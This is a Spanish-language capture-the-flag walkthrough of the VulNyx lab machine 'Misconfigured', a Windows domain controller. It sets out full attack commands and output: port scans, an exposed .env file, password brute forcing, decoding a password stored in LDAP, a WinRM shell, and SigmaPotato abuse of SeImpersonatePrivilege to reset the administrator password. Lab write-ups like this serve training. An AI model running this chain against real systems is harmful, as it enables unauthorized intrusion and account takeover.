VulNyx - Misconfigured
Information
Misconfigured es una máquina virtual vulnerable Windows de dificultad media de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en el hipervisor VirtualBox.
Enumeration
Nmap
TCP
root@kali:~ ❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.37
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-07 12:31 CEST
Nmap scan report for 192.168.1.37
Host is up (0.00074s latency).
Not shown: 65507 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5357/tcp open wsdapi
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49674/tcp open unknown
49679/tcp open unknown
49684/tcp open unknown
49691/tcp open unknown
49704/tcp open unknown
root@kali:~ ❯ nmap -sVC -p53,80,88,135,139,389,445,464,593,636,3268,3269,5357,5985,9389,47001,49664,49665,49666,49667,49669,49670,49671,49674,49679,49684,49691,49704 192.168.1.37
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-07 12:33 CEST
Nmap scan report for 192.168.1.37
Host is up (0.00040s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-07 19:34:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: allsafe.nyx0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: allsafe.nyx0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:67:78:25 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: MISCONFIGURED; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 9h00m01s
| smb2-time:
| date: 2025-10-07T19:34:57
|_ start_date: N/A
|_nbstat: NetBIOS name: MISCONFIGURED, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:67:78:25 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Shell (c.slater)
80/TCP (HTTP)
Site (/)
Directory Brute Force
root@kali:~ ❯ gobuster dir -w /opt/common.txt -u http://192.168.1.37/
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.37/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.env (Status: 200) [Size: 53]
Progress: 4746 / 4746 (100.00%)
===============================================================
Finished
===============================================================
Site (/.env)
Dentro del archivo .env enumero al usuario a.moss
root@kali:~ ❯ curl -sX GET "http://192.168.1.37/.env"
DB_HOST="127.0.0.1"
DB_USER="a.moss"
DB_PASS="null"
445/TCP (SMB)
Basic Enumeration
Agrego el dominio encontrado allsafe.nyx a mi archivo /etc/hosts para futuros ataques
root@kali:~ ❯ netexec smb 192.168.1.37
SMB 192.168.1.37 445 MISCONFIGURED [*] Windows 10 / Server 2019 Build 17763 x64 (name:MISCONFIGURED) (domain:allsafe.nyx) (signing:True) (SMBv1:False)
Shares
Null Session
root@kali:~ ❯ smbclient -NL //192.168.1.37
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.1.37 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
root@kali:~ ❯ smbmap --no-banner -H 192.168.1.37 -u '' -p ''
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 192.168.1.37, no fun for you...
[*] Closed 1 connections
root@kali:~ ❯ netexec smb 192.168.1.37 -u '' -p '' --shares
SMB 192.168.1.37 445 MISCONFIGURED [*] Windows 10 / Server 2019 Build 17763 x64 (name:MISCONFIGURED) (domain:allsafe.nyx) (signing:True) (SMBv1:False)
SMB 192.168.1.37 445 MISCONFIGURED [+] allsafe.nyx\:
SMB 192.168.1.37 445 MISCONFIGURED [-] Error enumerating shares: STATUS_ACCESS_DENIED
RPC
Null Session
root@kali:~ ❯ rpcclient -NU "" 192.168.1.37 -c "srvinfo"
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
Password Brute Force
En tenencia del usuario a.moss intento obtener con netexec el password y obtengo éxito con Password1
root@kali:~ ❯ netexec smb 192.168.1.37 -u 'a.moss' -p /opt/techyou.txt | grep -v '[-]'
SMB 192.168.1.37 445 MISCONFIGURED [*] Windows 10 / Server 2019 Build 17763 x64 (name:MISCONFIGURED) (domain:allsafe.nyx) (signing:True) (SMBv1:False)
SMB 192.168.1.37 445 MISCONFIGURED [+] allsafe.nyx\a.moss:Password1
389/TCP (LDAP)
Null Session
root@kali:~ ❯ ldapsearch -x -H ldap://192.168.1.37 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=allsafe,DC=nyx
namingcontexts: CN=Configuration,DC=allsafe,DC=nyx
namingcontexts: CN=Schema,CN=Configuration,DC=allsafe,DC=nyx
namingcontexts: DC=DomainDnsZones,DC=allsafe,DC=nyx
namingcontexts: DC=ForestDnsZones,DC=allsafe,DC=nyx
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
root@kali:~ ❯ ldapsearch -x -H ldap://192.168.1.37 -b "DC=allsafe,DC=nyx"
# extended LDIF
#
# LDAPv3
# base <DC=allsafe,DC=nyx> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
Autenticated
Obtengo un nuevo nombre de usuario llamado c.slater
root@kali:~ ❯ ldapsearch -H ldap://192.168.1.37 -D 'a.moss@allsafe.nyx' -w 'Password1' -b "DC=allsafe,DC=nyx" | grep "userPrincipalName"
userPrincipalName: a.moss@allsafe.nyx
userPrincipalName: c.slater@allsafe.nyx
En los detalles del usuario c.slater obtengo un password codificado y veo que forma parte del grupo Remote Management Users
root@kali:~ ❯ ldapsearch -H ldap://192.168.1.37 -D 'a.moss@allsafe.nyx' -w 'Password1' -b "DC=allsafe,DC=nyx" | grep "c.slater" -C 35
# Christian Slater, Users, allsafe.nyx
dn: CN=Christian Slater,CN=Users,DC=allsafe,DC=nyx
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Christian Slater
sn: Slater
description: IT Department
userPassword:: UEB6elcwcmQyMDI1IQ==
givenName: Christian
distinguishedName: CN=Christian Slater,CN=Users,DC=allsafe,DC=nyx
instanceType: 4
whenCreated: 20251006111509.0Z
whenChanged: 20251007030156.0Z
displayName: Christian Slater
uSNCreated: 33827
memberOf: CN=Remote Management Users,CN=Builtin,DC=allsafe,DC=nyx
uSNChanged: 77857
name: Christian Slater
objectGUID:: IyOxWL7XB0m3+UkTKFGYkw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 134042443991737590
lastLogoff: 0
lastLogon: 134042444030493615
pwdLastSet: 134042229099181623
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAw+oenlPZXEp9EBgLUAQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: c.slater
sAMAccountType: 805306368
userPrincipalName: c.slater@allsafe.nyx
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=allsafe,DC=nyx
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 134042231679202346
Decodifico la cadena en base64 encontrada en el objeto userPassword y obtengo el password en texto plano
root@kali:~ ❯ base64 -d <<< 'UEB6elcwcmQyMDI1IQ=='
P@zzW0rd2025!
389/TCP (LDAP)
Verifico las credenciales obtenidas y accedo al sistema como usuario c.slater
root@kali:~ ❯ netexec smb 192.168.1.37 -u 'c.slater' -p 'P@zzW0rd2025!'
SMB 192.168.1.37 445 MISCONFIGURED [*] Windows 10 / Server 2019 Build 17763 x64 (name:MISCONFIGURED) (domain:allsafe.nyx) (signing:True) (SMBv1:False)
SMB 192.168.1.37 445 MISCONFIGURED [+] allsafe.nyx\c.slater:P@zzW0rd2025!
root@kali:~ ❯ netexec winrm 192.168.1.37 -u 'c.slater' -p 'P@zzW0rd2025!'
WINRM 192.168.1.37 5985 MISCONFIGURED [*] Windows 10 / Server 2019 Build 17763 (name:MISCONFIGURED) (domain:allsafe.nyx)
WINRM 192.168.1.37 5985 MISCONFIGURED [+] allsafe.nyx\c.slater:P@zzW0rd2025! (Pwn3d!)
root@kali:~ ❯ evil-winrm -i 192.168.1.37 -u 'c.slater' -p 'P@zzW0rd2025!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\c.slater\Documents> whoami ; hostname
allsafe\c.slate
Privilege Escalation
Enumeration
Privileges
El usuario c.slate dispone del privilegio SeImpersonatePrivilege
*Evil-WinRM* PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
OS & Kernel
Verifico que estoy ante un sistema operativo Windows Server 2019 (x64)
*Evil-WinRM* PS C:\> Get-ComputerInfo
WindowsBuildLabEx : 17763.1.amd64fre.rs5_release.180914-1434
WindowsCurrentVersion : 6.3
WindowsEditionId : ServerStandardEval
WindowsInstallationType : Server
WindowsInstallDateFromRegistry : 10/6/2025 8:56:34 AM
WindowsProductId : 00431-10000-00000-AA987
WindowsProductName : Windows Server 2019 Standard Evaluation
WindowsRegisteredOrganization :
WindowsRegisteredOwner : Windows User
WindowsSystemRoot : C:\Windows
WindowsVersion : 1809
*Evil-WinRM* PS C:\> [Environment]::Is64BitOPeratingSystem
True
Abuse
SeImpersonatePrivilege
Uso SigmaPotato para escalar privilegios, transfiero el binario SigmaPotato.exe al equipo víctima
❯ mv /home/kali/Downloads/SigmaPotato.exe .
*Evil-WinRM* PS C:\Users\c.slater\Documents> upload SigmaPotato.exe
Info: Uploading /root/SigmaPotato.exe to C:\Users\c.slater\Documents\SigmaPotato.exe
Data: 84648 bytes of 84648 bytes copied
Info: Upload successful!
Ejecuto SigmaPotato.exe y cambio el password del usuario administrator
*Evil-WinRM* PS C:\Users\c.slater\Documents> .\SigmaPotato.exe "net user administrator Password1"
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 744 | Token: 0x804 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 940
[+] Current Command Length: 32 characters
[+] Creating Process via 'CreateProcessWithTokenW'
[+] Process Started with PID: 3468
[+] Process Output:
The command completed successfully.
Verifico las nuevas credenciales y accedo como usuario administrator
root@kali:~ ❯ netexec smb 192.168.1.37 -u 'administrator' -p 'Password1'
SMB 192.168.1.37 445 MISCONFIGURED [*] Windows 10 / Server 2019 Build 17763 x64 (name:MISCONFIGURED) (domain:allsafe.nyx) (signing:True) (SMBv1:False)
SMB 192.168.1.37 445 MISCONFIGURED [+] allsafe.nyx\administrator:Password1 (Pwn3d!)
root@kali:~ ❯ netexec winrm 192.168.1.37 -u 'administrator' -p 'Password1' 2>/dev/null
WINRM 192.168.1.37 5985 MISCONFIGURED [*] Windows 10 / Server 2019 Build 17763 (name:MISCONFIGURED) (domain:allsafe.nyx)
WINRM 192.168.1.37 5985 MISCONFIGURED [+] allsafe.nyx\administrator:Password1 (Pwn3d!)
root@kali:~ ❯ evil-winrm -i 192.168.1.37 -u 'administrator' -p 'Password1' 2>/dev/null
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami ; hostname
allsafe\administrator
MISCONFIGURED
Flags
Ya como usuario administrator puedo leer las flags user.txt y root.txt
*Evil-WinRM* PS C:\> type c:\users\c.slater\desktop\user.txt
e64*****************************
*Evil-WinRM* PS C:\> type c:\users\administrator\desktop\root.txt
035*****************************
Hasta aquí la resolución de la máquina Misconfigured.
Happy Hacking!